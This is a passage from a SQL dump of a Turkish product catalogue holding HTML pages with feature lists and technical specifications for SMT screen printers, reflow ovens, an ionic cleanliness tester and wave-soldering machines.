-53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Geniş baskı veritabanı ile baskı parametreleri otomatik ayarlanır</span></div>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 10pt;\">&nbsp;</span></p>\r\n</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; width: 463px; border-collapse: collapse; margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"height: 17.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"23\">MODEL ADI</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">SP18P-L</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Model No</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">NM-EJP1A</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 50mm x W 50mm -&nbsp; L 510mm x W 460mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Döngü Zamanı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">8&nbsp;sn + Baskı Süresi</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hassasiyet</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">±12.5 µm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Çerçeve Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 736 x W 736, L 650 x W 550 (Dikey Durumda)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Güç Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1 faz AC 200 V&nbsp; 1.4 kVA</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hava Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">0,5 MPa, 30 L/min (A.N.R)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Boyutlar</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">W 1100 mm x D 1536mm x H 1430mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','SP-18P-L','','','','sp-18p-l'),(12,'Screen Printer - Semi-automatic','<h5 style=\"text-align: left;\"><span style=\"font-size: 0.83em; color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">ASP-300 Semi-Automatic Screen Printer</span></h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;<img src=\"images/tolo/T_asp-300_m.jpg\" alt=\"\" /></td>\r\n<td style=\"font-size: 10px;\">&nbsp;\r\n<div class=\"O\">\r\n<div>&nbsp;</div>\r\n<ul>\r\n<li><span style=\"font-size: 10pt;\"><strong>Güvenilir-Hassas Lehimleme</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Motorlu baskı kafa hareketi&nbsp;</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Kolay kullanım ve bakım&nbsp;</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Giriş ve Orta ölçekli uygulamalarda&nbsp;&nbsp;yüksek performans</strong></span></li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\" dir=\"ltr\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>\r\n<div style=\"margin-left: 30px;\">Model İsmi</div>\r\n</td>\r\n<td>\r\n<div style=\"margin-left: 30px;\">TOLO ASP-300</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Baskı Alanı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">300mm x 400 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Çerçeve Genişliği</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">370*470- 550*650mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Masa Ayarlaması</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">+/- 10mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Baskı Hassasiyeti</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.02 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Tekrarlama Hassasiyeti</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.02 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Fine Pitch</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.3 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">PCB Boyutu</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Max: 350*330mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">PCB Kalınlığı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.2 ? 2.0 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Hava Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">4-6 kg /cm²</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Güç Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">AC 220V 50 HZ</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Uzunluk</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">900 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Genişlik</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">900 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Yükseklik</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">1650 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Ağırlık</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">250kg</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','ASP-300','','','','asp-300'),(13,'Reflow Oven - 8-zone','<h2>TOLO LY-8C SMD REFLOW FIRIN</h2>\r\n<ul>\r\n<li>\r\n<p style=\"text-align: left;\">Zincir ve Mesh Konvey&ouml;r ile senkronize &ccedil;alışabilme</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>&Ouml;zel dizaynı sayesinde sabit &uuml;fleme hızı</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>S&uuml;per Kaliteli Al&uuml;minyum alaşımlı raylar</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Otomatik Yağlama Sistemi</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>20 dakikadan daha kısa s&uuml;rede hızlı ısı y&uuml;kselişi</p>\r\n</li>\r\n<li>\r\n<p style=\"text-align: left;\">G&uuml;&ccedil; kesintilerine karşı koruma</p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Model İsmi</td>\r\n<td>TOLO LY-8C</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtıcı Uzunluğu</td>\r\n<td>2953&nbsp;mm</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtma B&ouml;lge Sayısı</td>\r\n<td>8</td>\r\n</tr>\r\n<tr>\r\n<td>Soğutma B&ouml;lge Sayısı</td>\r\n<td>2</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Derecesi</td>\r\n<td>300 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Hassasiyeti</td>\r\n<td>&plusmn;&nbsp;1 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Sapması</td>\r\n<td>&plusmn;&nbsp;2 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Soğutma Tipi</td>\r\n<td>Air cooling</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Y&uuml;ksekliği</td>\r\n<td>900&plusmn;&nbsp;20 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Tipi</td>\r\n<td>Zincir ve Mesh</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Boyutları</td>\r\n<td>70-400 mm(W)</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Transfer Y&ouml;n&uuml;</td>\r\n<td>L-&gt;R (R-&gt;L)</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Hızı</td>\r\n<td>0-1200 mm/min</td>\r\n</tr>\r\n<tr>\r\n<td>Zincir genişlik aralığı</td>\r\n<td>70-400 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Mesh genişliği</td>\r\n<td>460 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Enerji Kontrol&uuml;</td>\r\n<td>UPS (Konveyor ve PC)</td>\r\n</tr>\r\n<tr>\r\n<td>G&uuml;&ccedil;&nbsp;Kaynağı</td>\r\n<td>AC 3?380V 50 hz</td>\r\n</tr>\r\n<tr>\r\n<td>&Ccedil;alışma&nbsp;&nbsp;/ Başlangı&ccedil; G&uuml;c&uuml;</td>\r\n<td>7.5 /28 KW</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutları</td>\r\n<td>5100Lx1280Wx1580H</td>\r\n</tr>\r\n<tr>\r\n<td>Net Ağırlık</td>\r\n<td>1300 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','LY-8C','','','','ly-8c'),(47,'Cleanliness Tester','<h5 style=\"text-align: left;\">Zero-Ion G3 - Ionic Contamination (Cleanliness) Tester&nbsp;</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<ul>\r\n<li style=\"text-align: left;\">MIL-STD-200A, MIL-P-28809, IPC-001 TM650 Standartlarına uygundur</li>\r\n<li style=\"text-align: left;\">Windows İşletim Sistemi</li>\r\n<li style=\"text-align: left;\">Dinamik Ölçüm Teknolojisi</li>\r\n<li style=\"text-align: left;\">No-clean fluxlardaki zayıf ion aktivatörlerini algılar</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table cellspacing=\"0\">\r\n<tbody>\r\n<tr><th>Features</th><th>Zero Ion G3 12</th><th>Zero Ion G3 18</th><th>Zero Ion G3 24</th></tr>\r\n<tr>\r\n<td>Dimensions</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n</tr>\r\n<tr>\r\n<td>Weight</td>\r\n<td>288 lbs</td>\r\n<td>288 lbs</td>\r\n<td>288 lbs</td>\r\n</tr>\r\n<tr>\r\n<td>Electrical Requirements</td>\r\n<td>120VAC, 10 Amps,<br />Single Phase</td>\r\n<td>120VAC, 10 Amps,<br />Single Phase</td>\r\n<td>120VAC, 10 Amps,<br />Single Phase</td>\r\n</tr>\r\n<tr>\r\n<td>Test Cell Sizes</td>\r\n<td>12”x12”</td>\r\n<td>18”x18”</td>\r\n<td>24”x24”</td>\r\n</tr>\r\n<tr>\r\n<td>Test Method</td>\r\n<td>All</td>\r\n<td>All</td>\r\n<td>All</td>\r\n</tr>\r\n<tr>\r\n<td>Control</td>\r\n<td>All-in-One PC</td>\r\n<td>All-in-One PC</td>\r\n<td>All-in-One PC</td>\r\n</tr>\r\n<tr>\r\n<td>Interface</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n</tr>\r\n<tr>\r\n<td>ESD Counter Top</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n</tr>\r\n<tr>\r\n<td>Test Solution</td>\r\n<td>75% IPA / 25% DI</td>\r\n<td>75% IPA / 25% DI</td>\r\n<td>75% IPA / 25% DI</td>\r\n</tr>\r\n<tr>\r\n<td>Auto Print and SPC<br />Data Storage</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n</tr>\r\n<tr>\r\n<td>Dynamic Filtration</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n<td>Standard</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>','Zero Ion - G3','','','','zero-ion-g3'),(14,'SMT Reflow Oven - Desktop','<h2>GF-12-HC/HT&nbsp;Desktop SMD Reflow Oven</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li>\r\n<p>D&uuml;ş&uuml;k hacimli ve prototip &uuml;retimler i&ccedil;in \'Horizontal Convection\' ısıtma teknolojili masa&uuml;st&uuml; SMT lehimleme &ccedil;&ouml;z&uuml;m&uuml;</p>\r\n</li>\r\n<li>\r\n<p>Kurşunsuz lehimlemeye uygun</p>\r\n</li>\r\n<li>\r\n<p>Alt/&Uuml;st ısıtıcılı 3 Kabin + soğutma kabini</p>\r\n</li>\r\n<li>\r\n<p>Paslanmaz &ccedil;elik konvey&ouml;r ve ısıtıcı kabinler</p>\r\n</li>\r\n<li>\r\n<p>Ger&ccedil;ek zamanlı grafik sıcaklık g&ouml;sterimi ile kartın ısı profilinin belirlenmesine yardımcı olur</p>\r\n</li>\r\n<li>\r\n<p>Nitrojen opsiyonu</p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table id=\"zebra-blue\">\r\n<tbody style=\"width: 0px; height: 0px;\">\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>GF-12-HC/HT</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Kart Boyutları</td>\r\n<td>305mm x 305mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Kart Y&uuml;ksekliği</td>\r\n<td>35mm</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtma Kabini</td>\r\n<td>3 &Uuml;st + 3 Alt</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Sıcaklık</td>\r\n<td>HC: 250&ordm;C / HT: 350&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtma T&uuml;nel Uzunluğu</td>\r\n<td>660mm</td>\r\n</tr>\r\n<tr>\r\n<td>Soğutma B&ouml;lge Sayısı</td>\r\n<td>1 Kabin (1Fan)</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen</td>\r\n<td>Opsiyon</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum G&uuml;&ccedil;</td>\r\n<td>5.5kW</td>\r\n</tr>\r\n<tr>\r\n<td>G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 ? 220VAC</td>\r\n</tr>\r\n<tr>\r\n<td>Makine Boyutları</td>\r\n<td>990mm x 813mm x 483mm</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','GF-12-HC/HT','','','','gf-12-hc-ht'),(15,'Wave-Soldering Machine','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">TOLO MI-300 WAVE-SOLDERING MACHINE</h2>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;<img src=\"images/urunler/t_mi300.jpg\" alt=\"\" border=\"0\" /></p>\r\n<ul style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Kurşunsuz Lehimleye uygun dizayn&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Japon yapımı Mitsubishi PLC Kontrol&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Masa &Uuml;st&uuml; dizaynı ile k&uuml;&ccedil;&uuml;k &uuml;retimlere ve esnek &uuml;retim yapısına uygun, bakım ve temizlik avantajı sunan&nbsp;</strong></span><span style=\"font-size: 10pt;\"><strong>yapısı&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>İşitsel ve g&ouml;rsel uyarı emniyet fren sistemi&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Enerji tasarrufu sağlayan yapısı</strong></span></span></p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" style=\"margin-left: 30px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">TOLO MI-300</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Kontrol Metodu</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">PLC, IR PID Kontrol</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Motoru</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V 60W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehimleme Isısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">300&deg;C, 12KW</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Y&uuml;ksekliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">0-12 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Motoru</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V 90W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Tırnak Temizleme Pompası</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V&nbsp;&nbsp;6W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehim Kapasitesi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">214kg</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Flux Sistemi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">K&ouml;p&uuml;k (Foam)</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Sıcaklığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">110-150&deg;C</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Uzunluğu&nbsp;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1x800 mm&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Soğutma Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Hava Soğutmalı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Konvey&ouml;r Y&uuml;ksekliği</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">360+/-10mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r A&ccedil;ısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">4 - 6&deg;</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">G&uuml;&ccedil; Kesilme Emniyeti</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Konvey&ouml;r ve Bilgisayar i&ccedil;in kesintisiz g&uuml;&ccedil; kaynağı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">50 ? 300 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">PCB Transfer Y&ouml;n&uuml;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">L-&gt;R&nbsp;&nbsp;&nbsp;/ (R-&gt;L )</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Hızı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">300-900 mm/dk.&nbsp;&nbsp;(Panasonic Hız Kontrol&uuml;)</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">G&uuml;&ccedil; Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">3P AC380V 50HZ</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Başlangı&ccedil; /&Ccedil;alışma G&uuml;c&uuml;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">13KW / 3.5KW</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Boyutları</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">2570(L) X 1000 (W) X 845(H) mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','MI-300','','','','mi-300'),(16,'Wave-soldering (Desktop)','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">LFS 1&nbsp;DESKTOP WAVE-SOLDERING MACHINE</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/global/LFS 1 Photo.gif\" alt=\"\" /></p>\r\n<ul style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Kurşunsuz &uuml;retime uygun&nbsp;titanyum pota</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Titanyum tırnaklı palet sistemi</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>T&uuml;m lehimleme parametreleri kolaylıkla kontrol edilebilir</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Y&uuml;ksek kaliteli ısıtıcı elemanları ile kararlı ve g&uuml;venilir makine performansı&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>T&uuml;m lehimleme ihtiya&ccedil;larınızı karşılayan performans&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Uygun fiyat&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>K&uuml;&ccedil;&uuml;k boyutlar ve d&uuml;ş&uuml;k enerji t&uuml;ketimi</strong></span></span></li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" style=\"margin-left: 30px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">LFS 1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Kontrol Metodu</td>\r\n<td style=\"margin-left: 30px;\" 